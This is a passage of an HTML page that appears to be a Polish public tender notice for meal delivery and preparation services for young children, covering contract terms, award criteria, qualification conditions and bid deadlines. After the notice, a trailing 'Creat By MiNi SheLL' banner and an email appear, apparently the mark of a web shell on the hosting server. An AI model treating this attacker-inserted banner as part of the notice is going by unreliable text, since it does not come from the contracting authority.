pokonsumpcyjnych. W powyższym zakresie<br/>do obowiązków Wykonawcy należy przyjęcie na siebie obowiązków wytwórcy odpadów<br/>i prowadzenie gospodarki odpadami zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (tj.Dz. U. z 2021, poz. 779 z poźn. zm.), a w szczególności prowadzenie kart ewidencji odpadu<br/>oraz przekazania odpadu do uprawnionego odbiorcy i w razie konieczności dostarczenie ich<br/>kopii do Zamawiającego.<br/>21. Zamawiający może w każdej chwili dokonać kontroli produktów z jakich są przygotowywane<br/>potrawy w dniu dostawy posiłków, bez wcześniejszego informowania wykonawcy. W razie uwag,<br/>wykonawca jest zobowiązany do usunięcia dań wobec, którego zamawiający ma zastrzeżenia.<br/>Wszystkie odstępstwa od przedmiotu zamówienia winny być wcześniej ustalane z<br/>Zamawiającym.<br/>Wykonawca jest zobowiązany do zmiany jadłospisu przekazanego przez Zamawiającego na<br/>dwa dni przed jego obowiązywaniem.<br/>22. Zgodnie z art. 68 ust. 3 ustawy z dnia 11 stycznia 2018r. o elektromobilności i paliwach<br/>alternatywnych Wykonawca zobowiązuje się by udział pojazdów elektrycznych lub pojazdów<br/>napędzanych gazem ziemnym we flocie pojazdów użytkowanych przy wykonywaniu tego<br/>zadania wyniósł co najmniej 10%. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">19. Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>P.Z.P. Zamówienie polegające na powtórzeniu podobnych usług zostanie udzielone w okresie 3 lat od<br/>dnia udzielenia zamówienia podstawowego w przypadku, gdy zaistnieje uzasadniona potrzeba<br/>rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel(nie więcej<br/>niż 50% zamówienia podstawowego).<br/>Przedmiot zamówienia zostanie wykonany w kuchni Wykonawcy, zwanej dalej „Kuchnią” z jego<br/>materiałów i środkami Wykonawcy, przez zatrudnionych przez niego pracowników</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga by Wykonawca wykazał się, że jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie wykonywania działalności gospodarczej związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną minimum 100.000,00 zł (słownie złotych: sto tysięcy 00/100)<br/>4) zdolności technicznej lub zawodowej:<br/>Warunek spełni Wykonawca, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub<br/>wykonuje należycie minimum 2 usługi o wartości nie mniejszej niż 50 000,00 PLN brutto każda<br/>polegające na świadczeniu usług zbiorowego żywienia dzieci w wieku uprawniającym do<br/>uczęszczania do żłobka lub przedszkola. W przypadku podania wartości w walucie innej niż<br/>PLN, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP, który jest<br/>dostępny pod adresem www.nbp.pl opublikowany w dniu publikacji ogłoszenia o zamówieniu.<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> pisemnej, pod rygorem nieważności.<br/>2. Strony dopuszczają możliwość zmiany postanowień umowy w stosunku do treści oferty, na<br/>podstawie, której dokonano wyboru wykonawcy w następujących przypadkach:<br/>1) przejścia na następców prawnych praw i obowiązków Wykonawcy, w tym wynikających z<br/>niniejszej Umowy, na podstawie pisemnego wniosku Wykonawcy, który wymaga akceptacji<br/>Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy w takim przypadku dotyczy tylko<br/>zmiany oznaczenia Wykonawcy z zachowaniem pozostałych postanowień umowy,<br/>2) zmiany w oznaczeniu firmy (nazwy) Wykonawcy, na podstawie pisemnego wniosku<br/>Wykonawcy, który wymaga akceptacji Zamawiającego, z tym zastrzeżeniem, iż zmiana umowy<br/>w takim przypadku dotyczy tylko zmiany oznaczenia Wykonawcy z zachowaniem pozostałych<br/>postanowień umowy,<br/>3) nastąpi zmiana stawki podatku VAT w odniesieniu do usług przewidzianych niniejszą umową,<br/>– zmiana wynagrodzenia brutto należnego wykonawcy nastąpi z dniem wejścia w życie aktu<br/>prawnego zmieniającego stawkę,<br/>4) na podstawie pisemnego wniosku Wykonawcy, zaakceptowanego przez Zamawiającego,<br/>jeżeli nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości<br/>minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10<br/>października 2002 r. o minimalnym wynagrodzeniu za pracę – jeżeli zmiana ta będzie miała<br/>wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>5) na podstawie pisemnego wniosku Wykonawcy, zaakceptowanego przez Zamawiającego,<br/>jeżeli nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne – jeżeli<br/>zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę,<br/>6) na podstawie pisemnego wniosku Wykonawcy, zaakceptowanego przez Zamawiającego,<br/>jeżeli nastąpi zmiana zasad gromadzenia i wysokości wpłat do pracowniczych planów<br/>kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach<br/>kapitałowych – jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez<br/>Wykonawcę,<br/>7) nastąpi zmiana terminu składania zamówień w trakcie realizacji umowy za pisemnym<br/>powiadomieniem Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com